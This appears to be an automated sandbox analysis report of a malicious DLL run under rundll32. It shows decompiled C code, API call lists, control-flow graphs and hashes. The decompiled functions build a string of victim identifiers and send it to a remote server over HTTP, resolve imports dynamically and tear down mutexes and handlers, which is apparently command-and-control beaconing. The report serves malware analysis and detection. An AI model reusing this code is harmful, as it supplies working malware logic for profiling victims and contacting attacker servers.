				intOrPtr* _t118;
				long _t119;
				int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;

				_t110 = __edx;
				_t106 = __ecx;
				_t127 =  &_v16;
				_t119 = __eax;
				_t32 =  *0x343a3e0; // 0x55e9b78
				_v4 = _t32;
				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x343a2d8, 0, 0x800); // executed
				_t105 = _t33;
				if(_t105 != 0) {
					if(_t119 == 0) {
						_t119 = GetTickCount();
					}
					_t35 =  *0x343a018; // 0x95dc214e
					asm("bswap eax");
					_t36 =  *0x343a014; // 0x3a87c8cd
					asm("bswap eax");
					_t37 =  *0x343a010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x343a00c; // 0x81762942
					asm("bswap eax");
					_t39 =  *0x343a348; // 0x21ad5a8
					_t3 = _t39 + 0x343b62b; // 0x74666f73
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x343a02c,  *0x343a004, _t119);
					_t42 = E03436927();
					_t43 =  *0x343a348; // 0x21ad5a8
					_t4 = _t43 + 0x343b66b; // 0x74707526
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
					_t129 = _t127 + 0x38;
					_t121 = _t120 + _t46;
					if(_a12 != 0) {
						_t100 =  *0x343a348; // 0x21ad5a8
						_t8 = _t100 + 0x343b676; // 0x732526
						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
						_t129 = _t129 + 0xc;
						_t121 = _t121 + _t103;
					}
					_t47 =  *0x343a348; // 0x21ad5a8
					_t10 = _t47 + 0x343b2de; // 0x74636126
					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
					_t130 = _t129 + 0xc;
					_t122 = _t121 + _t50; // executed
					_t51 = E034322D7(_t106); // executed
					_t112 = _t51;
					if(_t112 != 0) {
						_t95 =  *0x343a348; // 0x21ad5a8
						_t12 = _t95 + 0x343b8d0; // 0x736e6426
						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t98;
						HeapFree( *0x343a2d8, 0, _t112);
					}
					_t113 = E03432A11();
					if(_t113 != 0) {
						_t90 =  *0x343a348; // 0x21ad5a8
						_t14 = _t90 + 0x343b8d8; // 0x6f687726
						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t93;
						HeapFree( *0x343a2d8, 0, _t113);
					}
					_t114 =  *0x343a3cc; // 0x55e95b0
					_a20 = E03432509(0x343a00a, _t114 + 4);
					_t55 =  *0x343a370; // 0x0
					_t116 = 0;
					if(_t55 != 0) {
						_t86 =  *0x343a348; // 0x21ad5a8
						_t17 = _t86 + 0x343b8b2; // 0x3d736f26
						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t89;
					}
					_t56 =  *0x343a36c; // 0x0
					if(_t56 != _t116) {
						_t83 =  *0x343a348; // 0x21ad5a8
						_t19 = _t83 + 0x343b889; // 0x3d706926
						wsprintfA(_t122 + _t105, _t19, _t56);
					}
					if(_a20 != _t116) {
						_t123 = RtlAllocateHeap( *0x343a2d8, _t116, 0x800);
						if(_t123 != _t116) {
							E03431BE9(GetTickCount());
							_t62 =  *0x343a3cc; // 0x55e95b0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x343a3cc; // 0x55e95b0
							__imp__(_t66 + 0x40);
							_t68 =  *0x343a3cc; // 0x55e95b0
							_t69 = E03431D33(1, _t110, _t105,  *_t68); // executed
							_t126 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t126 != _t116) {
								StrTrimA(_t126, 0x343928c);
								_push(_t126);
								_t74 = E0343393C();
								_v20 = _t74;
								if(_t74 != _t116) {
									_t117 = __imp__;
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__;
									 *_t118(_t123, _v32);
									 *_t118(_t123, _t126);
									_t80 = E0343375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
									_v56 = _t80;
									if(_t80 != 0 && _t80 != 0x10d2) {
										E0343561E();
									}
									HeapFree( *0x343a2d8, 0, _v48);
									_t116 = 0;
								}
								HeapFree( *0x343a2d8, _t116, _t126);
							}
							RtlFreeHeap( *0x343a2d8, _t116, _t123); // executed
						}
						HeapFree( *0x343a2d8, _t116, _a12);
					}
					RtlFreeHeap( *0x343a2d8, _t116, _t105); // executed
				}
				return _v16;
			}





























































                                0x034356c8
                                0x034356c8
                                0x034356c8
                                0x034356dd
                                0x034356df
                                0x034356e4
                                0x034356e8
                                0x034356f0
                                0x034356f6
                                0x034356fa
                                0x03435702
                                0x0343570a
                                0x0343570a
                                0x0343570c
                                0x03435718
                                0x03435727
                                0x0343572c
                                0x0343572f
                                0x03435734
                                0x03435737
                                0x0343573c
                                0x0343573f
                                0x0343574b
                                0x03435758
                                0x0343575a
                                0x03435760
                                0x03435765
                                0x03435770
                                0x03435772
                                0x03435775
                                0x0343577b
                                0x0343577d
                                0x03435786
                                0x03435791
                                0x03435793
                                0x03435796
                                0x03435796
                                0x03435798
                                0x0343579d
                                0x034357a9
                                0x034357ab
                                0x034357ae
                                0x034357b0
                                0x034357b5
                                0x034357b9
                                0x034357bb
                                0x034357c0
                                0x034357cc
                                0x034357ce
                                0x034357da
                                0x034357dc
                                0x034357dc
                                0x034357e7
                                0x034357eb
                                0x034357ed
                                0x034357f2
                                0x034357fe
                                0x03435800
                                0x0343580c
                                0x0343580e
                                0x0343580e
                                0x03435814
                                0x03435827
                                0x0343582b
                                0x03435830
                                0x03435834
                                0x03435837
                                0x0343583c
                                0x03435847
                                0x03435849
                                0x0343584c
                                0x0343584c
                                0x0343584e
                                0x03435855
                                0x03435858
                                0x0343585d
                                0x03435867
                                0x03435869
                                0x03435870
                                0x03435888
                                0x0343588c
                                0x03435898
                                0x0343589d
                                0x034358a6
                                0x034358b7
                                0x034358bb
                                0x034358c4
                                0x034358ca
                                0x034358d2
                                0x034358d7
                                0x034358e4
                                0x034358ea
                                0x034358f6
                                0x034358fc
                                0x034358fd
                                0x03435902
                                0x03435908
                                0x0343590e
                                0x03435915
                                0x0343591c
                                0x03435922
                                0x03435929
                                0x0343592d
                                0x03435938
                                0x0343593d
                                0x03435943
                                0x0343594c
                                0x0343594c
                                0x0343595d
                                0x03435963
                                0x03435963
                                0x0343596d
                                0x0343596d
                                0x0343597b
                                0x0343597b
                                0x0343598c
                                0x0343598c
                                0x0343599a
                                0x0343599a
                                0x034359ab

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 034356F0
                                • GetTickCount.KERNEL32 ref: 03435704
                                • wsprintfA.USER32 ref: 03435753
                                • wsprintfA.USER32 ref: 03435770
                                • wsprintfA.USER32 ref: 03435791
                                • wsprintfA.USER32 ref: 034357A9
                                • wsprintfA.USER32 ref: 034357CC
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034357DC
                                • wsprintfA.USER32 ref: 034357FE
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0343580E
                                • wsprintfA.USER32 ref: 03435847
                                • wsprintfA.USER32 ref: 03435867
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03435882
                                • GetTickCount.KERNEL32 ref: 03435892
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 034358A6
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034358C4
                                • StrTrimA.SHLWAPI(00000000,0343928C,00000000,055E95B0), ref: 034358F6
                                • lstrcpy.KERNEL32(00000000,?), ref: 03435915
                                • lstrcpy.KERNEL32(00000000,?), ref: 0343591C
                                • lstrcat.KERNEL32(00000000,?), ref: 03435929
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0343592D
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0343595D
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0343596D
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,055E95B0), ref: 0343597B
                                • HeapFree.KERNEL32(00000000,?), ref: 0343598C
                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0343599A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                • String ID:
                                • API String ID: 2591679948-0
                                • Opcode ID: 35838d66addf79441c3d2e8a951829995a5c3ce957b6a6fe4b8a886d6669c461
                                • Instruction ID: 7438ae6b238f41792aac047c500d13018834c2911977fdfc573cc82993ae0dfb
                                • Opcode Fuzzy Hash: 35838d66addf79441c3d2e8a951829995a5c3ce957b6a6fe4b8a886d6669c461
                                • Instruction Fuzzy Hash: 6281CF71040204AFC711FFA5EC88E9B7BF8EB8A700B190515F888EF265D731E915DB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034734FF Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 143 34734ff-3473510 144 3473564-347356f 143->144 145 3473512-347351e call 3471268 call 348e869 143->145 146 3473576-3473588 call 3482650 144->146 147 3473571 call 3479e82 144->147 159 3473524-3473531 SleepEx 145->159 154 347358a-3473597 ReleaseMutex FindCloseChangeNotification 146->154 155 3473599-34735a0 146->155 147->146 154->155 157 34735a2-34735af ResetEvent CloseHandle 155->157 158 34735b1-34735be SleepEx 155->158 157->158 158->158 160 34735c0 158->160 159->159 161 3473533-347353a 159->161 162 34735c5-34735d2 SleepEx 160->162 163 3473550-3473562 RtlDeleteCriticalSection * 2 161->163 164 347353c-3473542 161->164 165 34735d4-34735d9 162->165 166 34735db-34735e2 162->166 163->144 164->163 167 3473544-347354b call 348e803 164->167 165->162 165->166 168 34735e4-34735ed HeapFree 166->168 169 34735f3-34735fa 166->169 167->163 168->169 171 3473602-3473608 169->171 172 34735fc-34735fd call 34883fa 169->172 174 347360a-3473611 171->174 175 3473619-3473620 171->175 172->171 174->175 176 3473613-3473615 174->176 177 3473622-3473623 RtlRemoveVectoredExceptionHandler 175->177 178 3473629-347362f 175->178 176->175 177->178 179 3473636 178->179 180 3473631 call 3479131 178->180 182 347363b-3473648 SleepEx 179->182 180->179 183 3473651-347365a 182->183 184 347364a-347364f 182->184 185 3473672-3473682 LocalFree 183->185 186 347365c-3473661 183->186 184->182 184->183 186->185 187 3473663 186->187 188 3473666-3473670 FindCloseChangeNotification 187->188 188->185 188->188
                                APIs
                                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 03473528
                                • RtlDeleteCriticalSection.NTDLL(0349A3E0), ref: 0347355B
                                • RtlDeleteCriticalSection.NTDLL(0349A400), ref: 03473562
                                • ReleaseMutex.KERNEL32(000005CC,00000000,?,?,?,0348E846), ref: 0347358B
                                • FindCloseChangeNotification.KERNEL32(?,?,0348E846), ref: 03473597
                                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0348E846), ref: 034735A3
                                • CloseHandle.KERNEL32(?,?,0348E846), ref: 034735AF
                                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0348E846), ref: 034735B5
                                • SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 034735C9
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0348E846), ref: 034735ED
                                • RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 03473623
                                • SleepEx.KERNEL32(00000064,00000001,?,?,0348E846), ref: 0347363F
                                • FindCloseChangeNotification.KERNEL32(0616F2C0,?,?,0348E846), ref: 03473668
                                • LocalFree.KERNEL32(?,?,0348E846), ref: 03473678
                                  • Part of subcall function 03471268: GetVersion.KERNEL32(?,?,76CDF720,?,03473517,00000000,?,?,?,0348E846), ref: 0347128C
                                  • Part of subcall function 03471268: GetModuleHandleA.KERNEL32(?,061697B5,?,76CDF720,?,03473517,00000000,?,?,?,0348E846), ref: 034712A9
                                  • Part of subcall function 03471268: GetProcAddress.KERNEL32(00000000), ref: 034712B0
                                  • Part of subcall function 0348E869: RtlEnterCriticalSection.NTDLL(0349A400), ref: 0348E873
                                  • Part of subcall function 0348E869: RtlLeaveCriticalSection.NTDLL(0349A400), ref: 0348E8AF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                • String ID:
                                • API String ID: 1259384122-0
                                • Opcode ID: d84e44a6f133efd32d08068b8c20a3520c8105747e55b960abe64ca3e9f36732
                                • Instruction ID: bb10ca680d3b8b89f9e8852fb847a1b7979ec09f20dee1156c6fe2073986f0d0
                                • Opcode Fuzzy Hash: d84e44a6f133efd32d08068b8c20a3520c8105747e55b960abe64ca3e9f36732
                                • Instruction Fuzzy Hash: 19416075B00301ABDB71FF65E986A9A77E9AB20740B590067E500FF3A8DB71D840DA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03437AF1 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E03437AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E03436D63(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E03436C2C(_t56);
					} else {
						E03436C2C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E03437A86) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E03436E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x343a348; // 0x21ad5a8
						_t15 = _t59 + 0x343b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                0x03437af1
                                0x03437af1
                                0x03437afc
                                0x03437b03
                                0x03437b0b
                                0x03437b15
                                0x03437b1b
                                0x03437b2e
                                0x03437b3e
                                0x03437b30
                                0x03437b33
                                0x03437b38
                                0x03437b38
                                0x03437b2e
                                0x03437b4e
                                0x03437b54
                                0x03437b59
                                0x03437c42
                                0x00000000
                                0x03437b74
                                0x03437b77
                                0x03437b8a
                                0x03437b90
                                0x03437b95
                                0x03437bbd
                                0x03437bd0
                                0x03437bda
                                0x03437bdd
                                0x03437be3
                                0x03437be8
                                0x00000000
                                0x00000000
                                0x03437bec
                                0x03437bf8
                                0x03437c09
                                0x03437c0b
                                0x03437c1c
                                0x03437c1c
                                0x03437c2c
                                0x00000000
                                0x03437c3e
                                0x00000000
                                0x03437c3e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03437b95

                                APIs
                                • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 03437B03
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 03437B26
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 03437B4E
                                • InternetSetStatusCallback.WININET(00000000,03437A86), ref: 03437B65
                                • ResetEvent.KERNEL32(?), ref: 03437B77
                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 03437B8A
                                • GetLastError.KERNEL32 ref: 03437B97
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 03437BDD
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 03437BFB
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 03437C1C
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 03437C28
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 03437C38
                                • GetLastError.KERNEL32 ref: 03437C42
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 71ba108df494f473a8f80e97d926e81630aa753e1a63db5de415be89a6c97a31
                                • Instruction ID: 79a417271e021d26d418fdde2b2182b0dfad1f1fac4e0c465c9f3fe4279977fa
                                • Opcode Fuzzy Hash: 71ba108df494f473a8f80e97d926e81630aa753e1a63db5de415be89a6c97a31
                                • Instruction Fuzzy Hash: 7C41AFB1540204BFDB31AF61DC49E5BBFBDEB4A700F24492AF582EB194E7719904CB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03437F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 243 3437f35-3437f9a 244 3437fbb-3437fe5 243->244 245 3437f9c-3437fb6 RaiseException 243->245 247 3437fe7 244->247 248 3437fea-3437ff6 244->248 246 343816b-343816f 245->246 247->248 249 3438009-343800b 248->249 250 3437ff8-3438003 248->250 251 34380b3-34380bd 249->251 252 3438011-3438018 249->252 250->249 262 343814e-3438155 250->262 254 34380c9-34380cb 251->254 255 34380bf-34380c7 251->255 256 343801a-3438026 252->256 257 3438028-3438035 LoadLibraryA 252->257 258 3438149-343814c 254->258 259 34380cd-34380d0 254->259 255->254 256->257 261 3438078-3438084 InterlockedExchange 256->261 260 3438037-3438047 GetLastError 257->260 257->261 258->262 266 34380d2-34380d5 259->266 267 34380fe-343810c GetProcAddress 259->267 268 3438057-3438073 RaiseException 260->268 269 3438049-3438055 260->269 270 3438086-343808a 261->270 271 34380ac-34380ad FreeLibrary 261->271 263 3438157-3438164 262->263 264 3438169 262->264 263->264 264->246 266->267 273 34380d7-34380e2 266->273 267->258 274 343810e-343811e GetLastError 267->274 268->246 269->261 269->268 270->251 275 343808c-3438098 LocalAlloc 270->275 271->251 273->267 276 34380e4-34380ea 273->276 278 3438120-3438128 274->278 279 343812a-343812c 274->279 275->251 280 343809a-34380aa 275->280 276->267 281 34380ec-34380ef 276->281 278->279 279->258 282 343812e-3438146 RaiseException 279->282 280->251 281->267 283 34380f1-34380fc 281->283 282->258 283->258 283->267
                                C-Code - Quality: 51%
                                			E03437F35(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x3430000;
				_t115 = _t139[3] + 0x3430000;
				_t131 = _t139[4] + 0x3430000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x3430000;
				_v16 = _t139[5] + 0x3430000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x3430002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x343a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x343a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x343a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x343a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x343a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x343a1b8; // 0x0
										 *_t102 = _t125;
										 *0x343a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x343a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                0x03437f44
                                0x03437f5a
                                0x03437f60
                                0x03437f62
                                0x03437f67
                                0x03437f6d
                                0x03437f72
                                0x03437f75
                                0x03437f83
                                0x03437f8a
                                0x03437f8d
                                0x03437f90
                                0x03437f91
                                0x03437f94
                                0x03437f97
                                0x03437f9a
                                0x03437f9f
                                0x03437fae
                                0x00000000
                                0x03437fb4
                                0x03437fbe
                                0x03437fc8
                                0x03437fcd
                                0x03437fcf
                                0x03437fd9
                                0x03437fdc
                                0x03437fdf
                                0x03437fe5
                                0x03437fe7
                                0x03437fe7
                                0x03437fea
                                0x03437fed
                                0x03437ff2
                                0x03437ff6
                                0x03438009
                                0x0343800b
                                0x034380b3
                                0x034380b3
                                0x034380ba
                                0x034380bd
                                0x034380c7
                                0x034380c7
                                0x034380cb
                                0x03438149
                                0x0343814c
                                0x0343814e
                                0x0343814e
                                0x03438155
                                0x03438157
                                0x03438161
                                0x03438164
                                0x03438167
                                0x03438167
                                0x00000000
                                0x034380cd
                                0x034380d0
                                0x034380fe
                                0x03438108
                                0x0343810c
                                0x03438114
                                0x03438117
                                0x0343811e
                                0x03438128
                                0x03438128
                                0x0343812c
                                0x03438131
                                0x03438140
                                0x03438146
                                0x03438146
                                0x0343812c
                                0x00000000
                                0x034380d7
                                0x034380da
                                0x034380e2
                                0x034380f7
                                0x034380fc
                                0x00000000
                                0x00000000
                                0x034380fc
                                0x00000000
                                0x034380e2
                                0x034380d0
                                0x034380cb
                                0x03438011
                                0x03438018
                                0x03438028
                                0x0343802b
                                0x03438031
                                0x03438035
                                0x03438078
                                0x03438084
                                0x034380ad
                                0x03438086
                                0x0343808a
                                0x03438090
                                0x03438098
                                0x0343809a
                                0x0343809d
                                0x034380a3
                                0x034380a5
                                0x034380a5
                                0x03438098
                                0x0343808a
                                0x00000000
                                0x03438084
                                0x0343803d
                                0x03438040
                                0x03438047
                                0x03438057
                                0x0343805a
                                0x0343806a
                                0x00000000
                                0x03438070
                                0x03438051
                                0x03438055
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03438055
                                0x03438022
                                0x03438026
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03438026
                                0x03437fff
                                0x03438003
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03437FAE
                                • LoadLibraryA.KERNEL32(?), ref: 0343802B
                                • GetLastError.KERNEL32 ref: 03438037
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0343806A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: 372e23c6b8b41d88ea8f6e8f93cf7f7f909bf92fb0f38f8123198096c0e463fd
                                • Instruction ID: 642f8a58182dfe0d0bb7c500c21273e51d7abe74ec229604502f8de0b57d6196
                                • Opcode Fuzzy Hash: 372e23c6b8b41d88ea8f6e8f93cf7f7f909bf92fb0f38f8123198096c0e463fd
                                • Instruction Fuzzy Hash: 1C810871A00305AFDB11DFA8D984AEEB7F5BB49310F15802AF945EB340E7B0E909CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343661D Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
